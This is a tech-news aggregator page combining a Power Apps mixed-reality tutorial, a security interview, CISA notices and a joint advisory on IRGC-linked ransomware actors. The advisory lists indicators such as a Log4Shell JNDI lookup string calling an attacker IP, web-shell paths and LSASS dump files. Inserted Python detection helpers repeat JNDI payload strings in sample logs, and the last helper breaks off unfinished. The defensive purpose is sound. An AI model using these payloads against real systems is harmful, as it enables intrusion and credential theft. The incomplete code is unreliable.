by Contributed | Sep 16, 2022 | Technology
This article is contributed. See the original author and article here.
For the past month, our Cloud Advocacy team has shared projects with you all that could be created with the Mixed Reality Toolkit. For this month, we’re taking a bit of a detour to showcase a Mixed Reality project that can be created with Microsoft Power Apps!
Power Apps is a platform for building organization-specific applications and tools; it includes a data platform that provides a flexible development environment for building custom apps for your business. Applications built with Power Apps can carry rich business logic to turn manual business functions into automated processes. They can also be accessed from mobile devices or the browser, and users can create them without writing code.
Power Apps provides an extensible platform for users with minimal coding experience to develop applications with rich business logic. In addition, creators find it easy to interact with data and metadata while using Power Apps.
Through Power Apps, you can create canvas applications. Microsoft Power Apps allows you to build business apps from a canvas with minimal coding. Creating a canvas app in Power Apps is as easy as dragging and dropping components onto the canvas, just like designing a PowerPoint presentation. You can also integrate business logic through various data sources.
For this week, we put Power Apps to the test to create an app that displays 3D models both directly on screen as well as in Mixed Reality! The result? An awesome learning experience that leverages the Smithsonian 3D API and open-source models! Joining me this week is Daniel Laskewitz, Sr. Cloud Advocate within our Power/Fusion Cloud Advocacy team. We partnered together to create this project and we’re excited to tell you more about it!
The Idea
In my last post, I shared with you all a VR museum experience that leveraged the Apollo 11 mission models provided by the Smithsonian 3D Digitization project. I wanted to explore other collections and thus landed on the Coral Collection. As I thought about how I could turn this collection into a learning opportunity, I thought it’d be cool to bring the models into my own space and learn more about coral both in-app and in Mixed Reality! What I envisioned would be an app that provides a selection of coral to both learn facts and view the models in ‘real life’ without the need to visit the museum. The added convenience of bringing the museum experience to me was the icing on the cake.
One of the cool parts about the Power Platform is that there are many data sources to connect to. There are already more than 800 available out of the box! But, even when your data source is not one of those 800 connectors, you can create your own connector. The Smithsonian 3D Digitization project also has an API available which offers the possibility to search for 3D objects. If you could combine that with the idea of the app with the collection of corals, it would be a real killer app.
Finding Inspiration
I’m a huge fan of using Dribbble and Pinterest to find inspiration for creating projects. For this project, I went down the rabbit hole of searching for AR Museum Apps. Once I exhausted that option, I began to search for AR Learning Apps. Having this variety in form and function provided insight into the various ways creators are designing UI for AR learning experiences.
After browsing the work of many creative designers, I settled on the following design for the app:
A mockup of the app.
Creating the Main Screen
If this app were to ever be created as a full-fledged experience, I’d imagine that there’d be an introduction for each collection available in the app. Keeping that in mind, I decided to create an introduction screen for the Corals and Coral Reefs collection. I leveraged a very beautiful image on Unsplash by Scott Web for the background and configured some basic Power Apps components. I wanted to maintain the vibrancy of the sea urchins while also ensuring that the text on the screen would be legible. With that said, I added a black rectangle component behind the collection description and lowered the opacity so that the white text would stand out more without taking away from the beauty of the sea urchins. Another thing I made sure to do was incorporate roundness as best as possible. The default Power Apps button is round; however, I desired more curvature. Therefore, I increased the border radius to 50 and got exactly what I wanted!
Introduction screen for Corals and Coral Reefs collection.
Storing Models on OneDrive
With the Introduction screen complete, I needed to find a place to store the models. We ran into a bit of a hiccup while trying to render the models in Mixed Reality using the API, so we needed an alternative solution. Fortunately, the models could be saved to OneDrive, and in turn a data connector could be made in Power Apps to OneDrive to reference the models. I’ll admit, this part of the project took quite a bit of setup because I had to both download the models and properly structure everything within the OneDrive folder. When you’re referencing models from OneDrive, you do so from an Excel spreadsheet that contains relative links to models within the overall project folder.
I’ll break it down for you:
The folder structure for the project assets.
Essentially, I had to first create a folder for the models and a folder for the photos of the coral. I made sure to follow a simple naming convention that could be reused for naming both models and photos – this proved to be beneficial for my memory! Then in the Excel spreadsheet, I created a row for each coral which included its species, a description, a photo, and a model. The photo and model columns each contain a relative link to the location of the coral’s photo and model, respectively.
Excel spreadsheet table for the coral.
After all the corals were added to the spreadsheet, I had to create a table of the data – this part (like all parts) is crucial because Power Apps pulls data from the table.
Creating the Galleries
After making the data connection in Power Apps to OneDrive, I was ready to create the galleries. After assigning the table as the data source, I configured the formula for the gallery components to display the image for the coral. I didn’t want to take up too much space on the screen with words – especially since species names are relatively long. Instead, I opted to just show the image. I also added more roundness to the UI by increasing the border radius of the images so that their corners were rounded. It really gave a different look and feel to the gallery as opposed to the default straight edges and corners.
Gallery screen for the app.
Creating the Information Screens
The final step for this portion of the project was to add in the 3D and Mixed Reality components. Power Apps provides a variety of Mixed Reality controls. For this project, I chose to integrate View in 3D and View in Mixed Reality:
View in 3D - The View in 3D control enables you to view 3D content in the app. You can rotate and zoom into the model with simple gestures.
View in Mixed Reality - The View in MR control enables you to see how a particular item might fit within a specified space. The control creates a button in your app. When the button is pressed, an overlay of the selected 3D model (in .glb, .stl, or .obj file formats) displays onto the live camera feed of the device.
After adding the necessary components to the screen, I dragged and dropped in the Mixed Reality components to add the wow-factor to the app. And honestly, it was like magic! All I needed to do was reference the model selected in the gallery in the Power Apps formula bar – I promise it was very easy! Specifically: galCoral.Selected.'3DModel'
Information screen for the app.
I’ll hand things over to Daniel now to share more about the work he did for the custom connector – Daniel, take it away!
Creating a Custom Connector
I have been working on the Independent Publisher Connectors program for over a year now. This program enables you to create connectors for the Power Platform and make them available for every user of the Power Platform, without having to be the owner of the API. If you would like to build a connector for a service that you use, you’re welcome to submit a connector for that in the Power Platform Connectors GitHub repository.
I love building connectors for the Power Platform. So, when I heard about the API that’s available from the Smithsonian 3D Digitization project, I wanted to build a connector for that API immediately. The Smithsonian 3D API has only one operation – the File Search operation – so that makes it easy to develop a connector for it!
When you build the connector, always make sure you think about the person who will use your connector later. In the Power Platform, it could very well be that other app makers also want to include your connector in their apps, so why not make it user friendly?
On top of building the connector – I also created a search screen to search for 3D objects and a screen where you can look at and interact with the 3D object.
Smithsonian 3D Search UI
Workshop
Oh – before we go, we have to tell you something exciting! We turned this entire project into a self-led workshop! To share the ability to create and host your own Power Apps workshop, we collaborated to create an entire workshop equipped with a slide deck and complete instructions from start to finish. You can find the workshop by visiting: https://aka.ms/mr-power-platform
The workshop consists of 5 labs and all the assets you’ll need to create your own version of the app we created. We’ve even provided the full Power Apps solutions as well. You’re welcome to swap out the models for your own! If you have any questions, feel free to submit a GitHub Issue and we’ll follow up with you in the repository.
by Scott Muniz | Sep 16, 2022 | Security
This article was originally posted by the FTC. See the original article here.
by Scott Muniz | Sep 15, 2022 | Security, Technology
by Contributed | Sep 15, 2022 | Technology
The security community is continuously changing, growing, and learning from each other to better position the world against cyber threats. In the latest post of our Community Voices blog series, Microsoft Senior Product Marketing Manager Brooke Lynn Weenig talks with Chris Wysopal, Co-Founder and Chief Technology Officer of Veracode. The thoughts below reflect Chris’s views, not the views of Chris’s employer, and are not legal advice. In this blog post, Chris talks about app security.
Brooke: How did you get into app security?
Chris: I started playing with computers around 10 or 12 and in high school in the pre-Internet days. I would dial-up bulletin board systems and find forbidden information that you could not find in the library. I wanted to learn how to program computers. What really got me thinking about cybersecurity was finding these underground bulletin boards and seeing people talk about breaking into systems. It was in the back of my mind as I went to college and learned to be a programmer. It drove me to take my programming skills and use them for building cybersecurity tools and helping people build secure applications.
Before Veracode, I was doing security consulting, whether a company needed someone to help design a secure network or authentication system or do forensics work or incident response work. This new field of app security was emerging with the Internet. Banks, for instance, were building web applications and saying, “We do not have anyone who can help us make sure this is secure.” Emerging attacks, like SQL injection and cross-site scripting, were coming out. We were coming up with techniques to help them find those attacks. I had a development background and knew how to write and inspect code. Combining the development background with cybersecurity seemed like a great way to do something unique.
Brooke: What are microservices and why are they on the rise?
Chris: Microservices are a new way of doing more agile development. Instead of building big, monolithic applications, where 10 scrum teams are all working together on one big application, why not have those 10 scrum teams each work on a small piece of an application that has an API and does one function, like authentication or report generation?
It allows a small scrum team of seven or eight people to write, test, and deploy their own code. It is a much more reliable and efficient way to put small pieces of code into production and allows you to reuse those services across many different applications. Customers will have a couple dozen microservices and they will build dozens of applications out of those microservices. Also, API is now the way you interact with microservices, so API security becomes the main thing you’re trying to secure.
It is important to make sure each microservice takes care of its own security by using encryption and strong authentication. Each microservice has to be logging its activity and each one needs to be tested for security because they have attack surface that an attacker can interact with. Ultimately, it is more secure because you are securing a more well-defined service rather than a big, monolithic application.
Brooke: What are the biggest security threats and how can companies protect themselves?
Chris: One of the emerging big ones is vulnerabilities in open source components like the Apache Log4J exploit, which was a series of critical vulnerabilities discovered in December 2021. The way that organizations use open source is kind of a set it and forget it. Two, three, or four years later, a critical vulnerability comes out and they scramble. “Where am I using Log4J?” and everyone stops doing everything to respond. There should be a process where you stay up to date so when new vulnerabilities come out, you have a process for updating your open-source usage efficiently.
I recommend that people use software composition analysis as part of the development pipeline, so every time they build the code, they are looking at the open source and seeing if there have been any new vulnerabilities since they built their code. They can update those before they push it into production and keep their open source fresh and secure instead of letting it age until it becomes a crisis. There is the acronym SOAR – security, orchestration, automation, and remediation. You can bring that to code and do things in as automated a way as possible. Check every time you build to deploy the code. If you are deploying daily, you are checking that daily. If it is monthly, you are checking it monthly.
Brooke: Will there be more automation and teaching machines to secure our code?
Chris: There was a presentation at Black Hat on GitHub’s Copilot, an AI pair programmer for developers, and it does a good job of writing code for developers. Of course, it learns how to do that from other code, and we know other code has vulnerabilities. These researchers found cases where Copilot was suggesting code that had vulnerabilities.
Even if you are using something like Copilot, you have to do security testing. It is not guaranteed that it gives you secure code, but on the other hand, if we have this other process of auto-remediation, maybe Copilot and auto-remediation can work together. Before it suggests the code, it can check it and make sure it is suggesting clean code. That just means that the two machines have to talk to each other first.
I do not want to make you think that we can fix every single vulnerability in an automated way, but if we can fix even half of them, that saves a huge amount of time.
Brooke: How do you help clients define their security control goals?
Chris: Different organizations are at different maturity levels. Some organizations don’t know how many applications they have, how many they’ve built, or where they are because they’re just starting out. A lot of it is what we call attack surface discovery, where you are discovering those web apps and APIs that you have exposed, or you’re going through your code repos and looking at all the different applications you’ve built.
The next step is prioritizing your applications because you don’t want to spend a lot of time on old legacy applications that are going away in a few months or in a year versus the brand-new line-of-business application you just started using that you know will last for 10 years. Then, look at your open-source vulnerabilities because those are in the National Vulnerability Database that everyone can read. Take a big prioritization approach and cut out things that you are not going to fix, whittling it down to just the most important applications and vulnerabilities. Automate that vulnerability finding process as much as possible.
Brooke: How can IT and security teams work together to solve vulnerabilities faster?
Chris: That’s a big question I get all the time because people struggle to get these two teams to work together. Traditionally, they have done their thing off on their own. The development team develops stuff. The security team looks at all kinds of assets, like what the organization has purchased versus built, and tries to secure those things themselves.
With ongoing development of a new application or an application that you’re constantly updating, those teams have to build a working relationship. The best way to do that is for people on each team to meet on a regular basis so each team understands the challenges, struggles, and priorities of the other team. You have to break out of the silos and meet on a regular basis – weekly is good – and then, you can do some cross-pollination.
At Veracode, we have the concept of security champions, where developers work alongside the application security experts and learn things like threat modeling or manual penetration testing. Find people who think this is fun and cool, and it may be a new career for them. Get people to volunteer, if possible, but also get people from the security team working alongside the developers and saying, “I will help configure your build pipeline and integrate security testing into your pipeline for you.” Those types of things go a long way in getting the teams to really work together.
Brooke: What is needed to close the app security talent gap?
Chris: A lot of security can be picked up either on the job or in a boot camp-type environment. I’ve been talking to community colleges in Massachusetts, where Veracode is headquartered, about having certificate programs where people can learn how to run a vulnerability scan and how to work in a SOC, like where to look at a malware alert that’s coming from someone’s laptop or at a suspicious phishing test.
We should have more boot camps and more certificate programs at community colleges, so that people don’t have to go to school for four years to do this or to switch careers. They can do this on the side and see if they like it. On the demand side, companies have to be willing to take on interns and people doing this as their first job. We have intern programs at Veracode, and they’ve been very successful. We’ve hired a lot of people that way.
To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.
by Scott Muniz | Sep 15, 2022 | Security, Technology
CISA has added six new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise. Note: to view the newly added vulnerabilities in the catalog, click on the arrow in the “Date Added to Catalog” column, which will sort by descending dates.
Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information.
Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the specified criteria.
by Scott Muniz | Sep 15, 2022 | Security, Technology
CISA and the National Security Agency (NSA) have published Open Radio Access Network Security Considerations. This product—generated by the Enduring Security Framework (ESF) Open Radio Access Network (RAN) Working Panel, a subgroup within the cross-sector working group—assessed the benefits and security considerations associated with implementing an Open RAN architecture. Focusing on current designs and specification standards, the ESF Open RAN Working Panel examined how security compares with, and is distinct from, traditional, proprietary RANs.
CISA encourages users, network operators, vendors, and stakeholders to review the considerations. For more information, see the ESF’s Open Radio Access Network Security Considerations, peruse CISA’s 5G Library, and visit Securing 5G Open RAN Architecture from Cybersecurity Risks.
by Scott Muniz | Sep 15, 2022 | Security
by Contributed | Sep 14, 2022 | Technology
We have released an update to Microsoft.Data.SqlClient, version 4.1.1. The update addresses several issues that are important to our customers.
Updates in Microsoft.Data.SqlClient 4.1.1 include:
Fixed
- Fixed connection failure by not requiring Certificate Revocation List (CRL) check during authentication. #1706
- Parallelized SSRP requests on Linux and macOS when MultiSubNetFailover is specified. #1708, #1746
- Added CommandText length validation when using stored procedure command types. #1709
- Fixed NullReferenceException during Azure Active Directory authentication. #1710
- Fixed null SqlBinary as rowversion. #1712
- Fixed table’s collation overriding with default UTF8 collation. #1749
Changed
- Updated Microsoft.Data.SqlClient.SNI (.NET Framework dependency) and Microsoft.Data.SqlClient.SNI.runtime (.NET Core/Standard dependency) version to v4.0.1 #1755, which includes the fix for the AppDomain crash introduced in issue #1418
- Code improvements: #1711
To get the new package, add a NuGet reference to Microsoft.Data.SqlClient in your application.
For the list of changes in Microsoft.Data.SqlClient 4.1.1, you can also see the Release Notes.
If you encounter any issues or have any feedback, head over to the SqlClient GitHub repository and submit an issue.
David Engel
by Scott Muniz | Sep 14, 2022 | Security, Technology
CISA has added two new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise. Note: to view the newly added vulnerabilities in the catalog, click on the arrow in the “Date Added to Catalog” column, which will sort by descending dates.
Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information.
Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the specified criteria.
by Scott Muniz | Sep 14, 2022 | Security, Technology
Summary
Actions to take today to protect against ransom operations:
• Keep systems and software updated and prioritize remediating known exploited vulnerabilities.
• Enforce MFA.
• Make offline backups of your data.
This joint Cybersecurity Advisory (CSA) is the result of an analytic effort among the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), U.S. Cyber Command (USCC) – Cyber National Mission Force (CNMF), the Department of the Treasury (Treasury), the Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), and the United Kingdom’s National Cyber Security Centre (NCSC) to highlight continued malicious cyber activity by advanced persistent threat (APT) actors that the authoring agencies assess are affiliated with the Iranian Government’s Islamic Revolutionary Guard Corps (IRGC). Note: The IRGC is an Iranian Government agency tasked with defending the Iranian Regime from perceived internal and external threats. Hereafter, this advisory refers to all the coauthors of this advisory as “the authoring agencies.”
This advisory updates joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities, which provides information on these Iranian government-sponsored APT actors exploiting known Fortinet and Microsoft Exchange vulnerabilities to gain initial access to a broad range of targeted entities in furtherance of malicious activities, including ransom operations. The authoring agencies now judge these actors are an APT group affiliated with the IRGC.
Since the initial reporting of this activity in the FBI Liaison Alert System (FLASH) report APT Actors Exploiting Fortinet Vulnerabilities to Gain Access for Malicious Activity from May 2021, the authoring agencies have continued to observe these IRGC-affiliated actors exploiting known vulnerabilities for initial access. In addition to exploiting Fortinet and Microsoft Exchange vulnerabilities, the authoring agencies have observed these APT actors exploiting VMware Horizon Log4j vulnerabilities for initial access. The IRGC-affiliated actors have used this access for follow-on activity, including disk encryption and data extortion, to support ransom operations.
The IRGC-affiliated actors are actively targeting a broad range of entities, including entities across multiple U.S. critical infrastructure sectors as well as Australian, Canadian, and United Kingdom organizations. These actors often operate under the auspices of Najee Technology Hooshmand Fater LLC, based in Karaj, Iran, and Afkar System Yazd Company, based in Yazd, Iran. The authoring agencies assess the actors are exploiting known vulnerabilities on unprotected networks rather than targeting specific entities or sectors.
This advisory provides observed tactics, techniques, and indicators of compromise (IOCs) that the authoring agencies assess are likely associated with this IRGC-affiliated APT. The authoring agencies urge organizations, especially critical infrastructure organizations, to apply the recommendations listed in the Mitigations section of this advisory to mitigate risk of compromise from these IRGC-affiliated cyber actors.
For a downloadable copy of IOCs, see AA22-257A.stix.
For more information on Iranian state-sponsored malicious cyber activity, see CISA’s Iran Cyber Threat Overview and Advisories webpage and FBI’s Iran Threat webpage.
Download the PDF version of this report: pdf, 836 kb
Technical Details
Threat Actor Activity
As reported in joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities, the authoring agencies have observed Iranian government-sponsored APT actors scanning for and/or exploiting the following known Fortinet FortiOS and Microsoft Exchange server vulnerabilities since early 2021 to gain initial access to a broad range of targeted entities: CVE-2018-13379, CVE-2020-12812, CVE-2019-5591, and CVE-2021-34473 (a ProxyShell vulnerability). The authoring agencies have also observed these APT actors leveraging CVE-2021-34473 against U.S. networks in combination with ProxyShell vulnerabilities CVE-2021-34523 and CVE-2021-31207. The NCSC judges that Yazd, Iran-based company Afkar System Yazd Company is actively targeting UK organizations. Additionally, ACSC judges that these APT actors have used CVE-2021-34473 in Australia to gain access to systems. The APT actors can leverage this access for further malicious activities, including deployment of tools to support ransom and extortion operations, and data exfiltration.
Since the activity was reported in 2021, these IRGC-affiliated actors have continued to exploit known vulnerabilities for initial access. In addition to exploiting Fortinet and Microsoft Exchange vulnerabilities, the authoring agencies have observed these APT actors exploiting VMware Horizon Log4j vulnerabilities CVE-2021-44228 (“Log4Shell”), CVE-2021-45046, and CVE-2021-45105 for initial access.
The IRGC-affiliated actors have used their access for ransom operations, including disk encryption and extortion efforts. After gaining access to a network, the IRGC-affiliated actors likely determine a course of action based on their perceived value of the data. Depending on the perceived value, the actors may encrypt data for ransom and/or exfiltrate data. The actors may sell the data or use the exfiltrated data in extortion operations or “double extortion” ransom operations where a threat actor uses a combination of encryption and data theft to pressure targeted entities to pay ransom demands.
IRGC-affiliated actor activity observed by the authoring agencies includes:
- In December 2021, the actors exploited ProxyShell vulnerabilities (likely CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207) on a Microsoft Exchange server to gain access to the network of a U.S. police department. The actors used their access to move laterally within the network, encrypt network devices with BitLocker, and hold the decryption keys for ransom.
- In December 2021, the actors exploited ProxyShell vulnerabilities (likely CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207), on a Microsoft Exchange server to gain access to the network of a U.S. regional transportation company. The actors used their access to move laterally within the network, encrypt network devices with BitLocker, and hold the decryption keys for ransom. This activity disrupted the transportation company’s operations for an extended period.
- In February 2022, the actors exploited a Log4j vulnerability (likely CVE-2021-44228, CVE-2021-45046, and/or CVE-2021-45105) in a VMware Horizon application to gain access to the network of a U.S. municipal government, move laterally within the network, establish persistent access, initiate crypto-mining operations, and conduct additional malicious activity.
- In February 2022, the actors may have exploited a Log4j vulnerability (likely CVE-2021-44228, CVE-2021-45046, and/or CVE-2021) to gain access to the network of a U.S. aerospace company. The actors leveraged a server that the authoring agencies assess is associated with the IRGC-affiliated actors to exfiltrate data from the company’s network.
MITRE ATT&CK® Tactics and Techniques
Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 11. See Appendix B for a table of the MITRE ATT&CK tactics and techniques observed.
The authoring agencies assess the following tactics and techniques are associated with this activity.
Resource Development [TA0042]
The IRGC-affiliated actors have used the following malicious and legitimate tools [T1588.001, T1588.002] for a variety of tactics across the enterprise spectrum:
- Fast Reverse Proxy (FRP) for command and control (C2)
- Plink for C2
- Remote Desktop Protocol (RDP) for lateral movement
- BitLocker for data encryption
- SoftPerfect Network Scanner for system network configuration discovery
Note: For additional tools used by these IRGC-affiliated cyber actors, see joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities.
Initial Access [TA0001]
As stated in the Technical Details section previously reported in joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities, the IRGC-affiliated actors gained initial access by exploiting known vulnerabilities [T1190].
The following IOCs, observed as of March 2022, are indicative of ProxyShell vulnerability exploitation on targeted entity networks:
- Web shells with naming conventions aspx_[11 randomly generated alphabetic characters].aspx, login.aspx, or default.aspx in any of the following directories:
- C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\ecp\auth
- C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth
- C:\inetpub\wwwroot\aspnet_client
The following IOCs, observed as of December 2021, are indicative of Log4j vulnerability exploitation on targeted entity networks:
- ${jndi:ldap//148.251.71.182:1389/RCE} (user agent string)
- RCE.class
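Added example (not part of the advisory): a small Python triage helper that applies the two IOC patterns above, the ProxyShell web-shell naming convention in the listed Exchange directories and the JNDI lookup marker in web-server log lines. The sample paths and log lines are constructed; 148.251.71.182 comes from the user-agent IOC above, while 198.51.100.7 is a documentation address.

```python
import re
from pathlib import PureWindowsPath

# Directories the advisory lists as ProxyShell web-shell drop locations.
WEBSHELL_DIRS = {
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\ecp\auth",
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth",
    r"C:\inetpub\wwwroot\aspnet_client",
}
_WEBSHELL_DIRS_LC = {d.lower() for d in WEBSHELL_DIRS}   # NTFS is case-insensitive

# File-name conventions from the advisory: aspx_<11 letters>.aspx, login.aspx, default.aspx.
WEBSHELL_NAME = re.compile(r"^(aspx_[A-Za-z]{11}|login|default)\.aspx$", re.IGNORECASE)

# Log4Shell lookup marker from the advisory's user-agent IOC. The ":" after the scheme is
# optional because the IOC is written "ldap//" while real probes carry "ldap://".
# NOTE: a literal "${jndi:" match misses obfuscated variants (nested lookups etc.).
JNDI = re.compile(r"\$\{jndi:(?P<scheme>[a-z]+):?//(?P<host>[^/}\s]+)", re.IGNORECASE)


def suspicious_webshell_paths(paths):
    """Return the paths whose directory AND file name both match the advisory's IOCs."""
    hits = []
    for p in paths:
        wp = PureWindowsPath(p)
        if str(wp.parent).lower() in _WEBSHELL_DIRS_LC and WEBSHELL_NAME.match(wp.name):
            hits.append(p)
    return hits


def log4shell_hits(lines):
    """Return (line_number, scheme, callback_host) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, start=1):
        m = JNDI.search(line)
        if m:
            hits.append((n, m.group("scheme").lower(), m.group("host")))
    return hits


# Constructed sample input (not from the advisory), mixing true positives with look-alikes.
SAMPLE_PATHS = [
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\ecp\auth\aspx_qwertyuiopa.aspx",
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\login.aspx",
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\logon.aspx",  # legitimate OWA page
    r"C:\inetpub\wwwroot\aspnet_client\aspx_short.aspx",   # wrong length, not the convention
    r"C:\Users\Public\default.aspx",                       # right name, directory not listed
]
SAMPLE_LOGS = [
    "2022-02-10 03:14:07 10.0.0.5 GET /portal/ - 443 - 203.0.113.9 Mozilla/5.0 200",
    "2022-02-10 03:14:09 10.0.0.5 GET /portal/ - 443 - 203.0.113.9 ${jndi:ldap//148.251.71.182:1389/RCE} 200",
    "2022-02-10 03:14:11 10.0.0.5 GET /portal/ - 443 - 203.0.113.9 ${JNDI:LDAP://198.51.100.7:1389/a} 500",
]

if __name__ == "__main__":
    for p in suspicious_webshell_paths(SAMPLE_PATHS):
        print("possible web shell:", p)
    for n, scheme, host in log4shell_hits(SAMPLE_LOGS):
        print(f"line {n}: JNDI lookup via {scheme} to {host}")
```

A directory match plus a name match is still only a lead: confirm by inspecting file contents and IIS logs for requests to the file before treating it as a web shell.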
The IRGC-affiliated actors may have made modifications to the Task Scheduler [T1053.005]. These modifications may display as unrecognized scheduled tasks or actions. Specifically, the below established tasks may be associated with this activity:
- Wininet
- Wininet’
- WinLogon
- CacheTask
Note: The potential exists that tasks associated with CacheTask or Wininet may be legitimate. For additional tasks used by these IRGC-affiliated cyber actors, see joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities.
Persistence [TA0003]
The IRGC-affiliated actors established new user accounts on domain controllers, servers, workstations, and active directories [T1136.001, T1136.002]. The actors enabled a built-in Windows account (DefaultAccount) and escalated privileges to gain administrator-level access to a network. Some of these accounts appear to have been created to look similar to other existing accounts on the network, so specific account names may vary per organization. In addition to unrecognized user accounts or accounts established to masquerade as existing accounts, the following account usernames may be associated with this activity:
- Domain Admin
- it_admin
- DefaultAccount
- Default01
Note: For additional account usernames associated with this activity, see joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities.
Exfiltration [TA0010]
The authoring agencies have observed the IRGC-affiliated actors dumping and subsequently exfiltrating the Local Security Authority Subsystem Service (LSASS) process memory on targeted entity networks in furtherance of credential harvesting. The following IOCs are associated with data exfiltration from targeted entity networks:
- C:\Windows\Temp\sassl[.]pmd
- C:\Windows\Temp\ssasl[.]zip
- C:\Users\DefaultAccount\AppData\Local\Temp\lsass[.]dmp
- C:\Users\DefaultAccount\AppData\Local\Temp\lsass[.]zip
The IRGC-affiliated actors forced BitLocker activation on host networks to encrypt data [T1486] and held the decryption keys for ransom. The corresponding ransom notes were sent to the targeted entity, left on the targeted entity network as a .txt file or printed on the targeted entity’s networked printer(s). The notes included the following contact information:
- @BuySafety (Telegram)
- @WeRBits (Telegram)
- +93794415076 (WhatsApp)
- werbits@onionmail[.]org
- buysafety@onionmail[.]org
- yacashcash@rambler[.]ru
Note: For additional contact information included in ransom notes, see joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities.
DETECTION
The authoring agencies recommend that organizations using Microsoft Exchange servers, Fortinet devices, and/or VMware Horizon applications investigate potential suspicious activity in their networks.
- Search for IOCs. Collect known-bad IOCs and search for them in network and host artifacts.
- Note: Refer to Appendix A for IOCs.
- Review Log4j vulnerabilities, including CVE-2021-44228, CVE-2021-45046, and CVE-2021-45105.
- Review Microsoft Exchange ProxyShell vulnerabilities, including CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207.
- As a precaution, review additional Microsoft Exchange vulnerabilities, including CVE-2021-31196, CVE-2021-31206, CVE-2021-33768, CVE-2021-33766, and CVE-2021-34470, because the authoring agencies have seen the actors broadly target Microsoft Exchange servers.
- Investigate exposed Microsoft Exchange servers, both patched and unpatched, for compromise.
- Review Fortinet FortiOS vulnerabilities, including CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591.
- Review VMware vulnerabilities, including any relevant vulnerabilities listed on the VMware security advisory page.
- Investigate changes to RDP, firewall, and Windows Remote Management (WinRM) configurations that may allow malicious cyber actors to maintain persistent access.
- Review domain controllers, servers, workstations, and active directories for new or unrecognized user accounts.
- Review Task Scheduler for unrecognized scheduled tasks. Additionally, manually review operating-system and scheduled tasks—including each step these tasks perform—for unrecognized “actions.”
- Review antivirus logs for indications they were unexpectedly turned off.
- Look for WinRAR and FileZilla in unexpected locations.
- Review servers and workstations for malicious executable files masquerading as legitimate Windows processes. Malicious files may not be found in the expected directory and may have cmd.exe or powershell.exe as their parent process.
Note: For additional approaches on uncovering malicious cyber activity, see joint advisory Technical Approaches to Uncovering and Remediating Malicious Activity, authored by CISA and the cybersecurity authorities of Australia, Canada, New Zealand, and the United Kingdom.
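Added example (not from the advisory) illustrating the last check in the list above in Python: a process-inventory triage that flags a binary carrying a core Windows process name when it runs outside its expected directory or was spawned by cmd.exe or powershell.exe. The process records are constructed, and the expected-directory map and parent-process rule are assumptions based on standard Windows behaviour rather than anything the advisory states.

```python
from pathlib import PureWindowsPath

# Legitimate locations of the Windows binaries whose names Table 1 of the advisory shows
# being impersonated (svchost.exe, dllhost.exe), plus lsass.exe and winlogon.exe.
# Assumption: standard Windows layout, nothing relocated.
EXPECTED_DIRS = {
    "svchost.exe":  {r"c:\windows\system32", r"c:\windows\syswow64"},
    "dllhost.exe":  {r"c:\windows\system32", r"c:\windows\syswow64"},
    "lsass.exe":    {r"c:\windows\system32"},
    "winlogon.exe": {r"c:\windows\system32"},
}
# The advisory notes that masquerading files may have a shell as parent; the genuine
# processes are normally started by services.exe, wininit.exe or svchost.exe, not a shell.
SHELL_PARENTS = {"cmd.exe", "powershell.exe"}


def triage_process(proc):
    """Return the reasons a process record looks like a masquerading binary ([] if none)."""
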